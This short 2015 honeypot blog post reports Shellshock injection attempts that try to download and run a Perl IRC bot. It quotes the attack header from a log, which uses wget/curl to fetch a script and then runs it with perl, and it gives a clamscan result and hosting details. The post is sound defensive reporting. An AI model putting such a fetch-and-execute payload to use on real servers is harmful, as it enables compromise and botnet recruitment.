Sonntag, 14. Juni 2015

Perl script injection:

The last two days several Shell injections have hit my Honeypot. Any of them tried to download a prscript and execute it

Jun 13 06:42:11 beeswarm [mypyfwa] 2015-06-13 06:42:11.531828 - - [12/Jun/2015:20:25:25 +0200] "GET / HTTP/1.1" 404 442 "() { :;}; cd /var/spool/samba/;wget;perl den;rm -fr den;curl -sO;perl den;rm -fr den*\"" "() { :;}; cd /var/spool/samba/;wget;perl den;rm -fr den;curl -sO;perl den;rm -fr den*\"" US SHELLinjection
I have downloaded the file manually, it is a perl IRCbot.

 / -f den
clamscan den
den: Trojan.IRCBot-1142 FOUND
The sources of the attrack are
  • (AU)
  • (US)
Both hosts seem to be hosted servers (1and1 and Ozservers)

The perl script seems to be written by "Jericho Security Team Perl Bot v3.0"
Strange as it is, the server address within the script is set to

Or even more strange that this domain is hosted by schlund

inetnum: -
netname:        SCHLUND-CUSTOMERS
descr:          1&1 Internet AG
country:        DE